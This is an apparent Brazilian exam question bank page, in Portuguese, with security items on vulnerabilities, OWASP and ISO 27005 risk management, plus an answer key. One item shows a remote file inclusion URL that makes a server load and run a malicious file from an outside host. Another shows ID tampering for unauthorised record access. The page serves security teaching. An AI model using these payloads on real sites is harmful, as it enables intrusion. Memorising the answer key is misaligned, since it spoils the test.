Questões de Concurso Sobre análise de vulnerabilidade e gestão de riscos em segurança da informação

Foram encontradas 839 questões

Q3212061 Segurança da Informação

Em relação à análise de vulnerabilidades, julgue o item a seguir. 


Cross-site scripting é um tipo clássico de CVE (Common Vulnerabilities and Exposures) que permite a neutralização de entradas com parâmetros inadequados para um sistema Web. 

Alternativas
Q3212060 Segurança da Informação

Em relação à análise de vulnerabilidades, julgue o item a seguir. 


Buffer overflow é um tipo de CWE (Common Weakness Enumeration) que ocorre quando a quantidade de dados no buffer é a mesma da capacidade de armazenamento correspondente alocada em memória pela aplicação. 

Alternativas
Q3210349 Segurança da Informação
Julgue o próximo item, a respeito de ataques de negação de serviço, controles CIS, gerenciamento de incidentes de segurança da informação e gestão de riscos e continuidade de negócio.

Considerando que os riscos, em sua maior parte, são estáticos, o monitoramento permanente de cenários de eventos, valores de ativos, ameaças e vulnerabilidades é desnecessário, podendo ser realizado essencialmente em ciclos periódicos de dois a três anos, conforme o tipo de negócio da organização.
Alternativas
Q3208546 Segurança da Informação

Julgue o item a seguir, a respeito de segurança da informação, políticas de segurança, classificação de informações e análise de vulnerabilidades. 


Ao implementar mecanismos para limitar o acesso a recursos informacionais para, apenas, indivíduos ou sistemas autorizados, o controle de acesso contribui diretamente para a confidencialidade na segurança da informação. 

Alternativas
Q3208545 Segurança da Informação

Julgue o item a seguir, a respeito de segurança da informação, políticas de segurança, classificação de informações e análise de vulnerabilidades. 


Considerando que uma organização adota o desenvolvimento de software seguro, o uso de ferramentas de varredura de vulnerabilidades será direcionado especificamente às bibliotecas de software de terceiros utilizadas pela organização. 

Alternativas
Q3204246 Segurança da Informação
Assinale a opção que corresponde à definição dada pelo National Institute of Standards and Technology (NIST) para o conceito de Vulnerabilidade.
Alternativas
Q3181007 Segurança da Informação
Um usuário doméstico relatou que seu computador começou a apresentar lentidão significativa após uma atualização automática do sistema operacional. O técnico identificou que o computador estava rodando um antivírus desatualizado e que várias atualizações de segurança estavam pendentes. Além disso, notou a presença de arquivos temporários acumulados e programas sendo executados na inicialização sem necessidade.

Com base nesse cenário, assinale a alternativa INCORRETA sobre as práticas recomendadas para manter a segurança e o desempenho do sistema.
Alternativas
Q3178541 Segurança da Informação
Referente à gestão de riscos em segurança da informação, analise as assertivas abaixo:

I. A análise de riscos envolve a identificação e avaliação dos riscos que podem impactar a segurança da informação.

II. O tratamento de risco pode incluir medidas para mitigar, transferir, aceitar ou evitar o risco.

III. O risco residual é o risco que permanece após a implementação de medidas de tratamento de risco.

Quais estão corretas?
Alternativas
Q3174951 Segurança da Informação
A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o 
Alternativas
Q3170572 Segurança da Informação

Julgue o próximo item, relativo a noções de segurança da informação e de serviço de inteligência.


A análise de riscos, além de englobar as ameaças e as vulnerabilidades, estende-se aos impactos decorrentes de cada evento adverso.

Alternativas
Q3170264 Segurança da Informação

Acerca de gestão de riscos e continuidade de negócio, julgue o item que se segue, com base na NBR ISO 27005:2019 e na Lei Geral de Proteção de Dados (LGPD). 


O processo de gestão de riscos de segurança da informação pode ser relativo à organização como um todo, mas também pode ser aplicado apenas a aspectos particulares de um controle da organização, como o seu plano de continuidade de negócios.

Alternativas
Q3170260 Segurança da Informação

Acerca de gestão de riscos e continuidade de negócio, julgue o item que se segue, com base na NBR ISO 27005:2019 e na Lei Geral de Proteção de Dados (LGPD). 


O processo de avaliação de riscos determina o valor dos ativos de informação, identifica as ameaças e vulnerabilidades aplicáveis, determina as consequências possíveis e prioriza os riscos derivados, ordenando-os de acordo com os critérios de avaliação de riscos estabelecidos. 

Alternativas
Q3170243 Segurança da Informação

A respeito de gestão de segurança da informação, protocolos de autenticação, ameaças e vulnerabilidades em aplicações e segurança de aplicativos web, julgue o item a seguir, considerando, no que couber, as disposições das normas técnicas NBR ISO/IEC 27001:2022 e NBR ISO/IEC 27002:2022. 


A camada de inteligência estratégica de ameaças de uma organização deve atuar na coleta de informações sobre as metodologias dos atacantes, bem como sobre as ferramentas e tecnologias envolvidas nos ataques.

Alternativas
Q3170242 Segurança da Informação

A respeito de gestão de segurança da informação, protocolos de autenticação, ameaças e vulnerabilidades em aplicações e segurança de aplicativos web, julgue o item a seguir, considerando, no que couber, as disposições das normas técnicas NBR ISO/IEC 27001:2022 e NBR ISO/IEC 27002:2022. 


No contexto do planejamento e do controle operacionais, a organização deve controlar as mudanças planejadas e analisar criticamente as consequências de mudanças não intencionais, tomando ações para mitigar quaisquer efeitos adversos, conforme necessário.

Alternativas
Q3170241 Segurança da Informação

A respeito de gestão de segurança da informação, protocolos de autenticação, ameaças e vulnerabilidades em aplicações e segurança de aplicativos web, julgue o item a seguir, considerando, no que couber, as disposições das normas técnicas NBR ISO/IEC 27001:2022 e NBR ISO/IEC 27002:2022. 


A metodologia OWASP (open web application security project) propõe um modelo de escopo de segurança restrito às etapas finais do desenvolvimento de software, focando principalmente na detecção e na mitigação de vulnerabilidades em produtos já prontos. 

Alternativas
Q3167178 Segurança da Informação

Acerca de ameaças e vulnerabilidades em aplicações, julgue o item a seguir.


Considere a seguinte URL.

https://prova.com/prova_seguranca?id=1332


Se nenhum outro controle estiver em vigor, um atacante pode simplesmente modificar o valor id para visualizar outros registros da aplicação em questão, sendo esse um exemplo de referência insegura a objetos que leva ao escalonamento horizontal de privilégios.

Alternativas
Q3167177 Segurança da Informação

Acerca de ameaças e vulnerabilidades em aplicações, julgue o item a seguir.


Uma das consequências de um ataque de CSRF (cross-site request forgery) bem-sucedido é que o atacante consegue levar o usuário vítima a executar uma ação involuntariamente, podendo causar prejuízos variados, conforme a aplicação explorada.



Alternativas
Q3162208 Segurança da Informação
Descendo para a terceira posição do OWASP Top Ten:2021, a categoria de Injeção inclui Enumerações de Fraquezas Comuns (Common Weaknesses Enumeration - CWE) notáveis como: CWE-79: Cross-site Scripting; CWE-89: SQL Injection e CWE-73: External Control of File Name or Path.
Assinale a alternativa que NÃO apresenta uma forma de mitigar vulnerabilidades nessa categoria.
Alternativas
Q3161388 Segurança da Informação
No gerenciamento de riscos, qual das opções abaixo exemplifica uma estratégia de mitigação de risco?
Alternativas
Q3161195 Segurança da Informação
O gerenciamento dos riscos é um ponto importante a ser considerado na disponibilização de aplicações. Sobre as etapas do processo de gerenciamento de riscos, marque a alternativa correta.
Alternativas
Respostas
161: E
162: E
163: E
164: C
165: E
166: A
167: E
168: D
169: D
170: C
171: C
172: C
173: E
174: C
175: E
176: C
177: C
178: C
179: C
180: C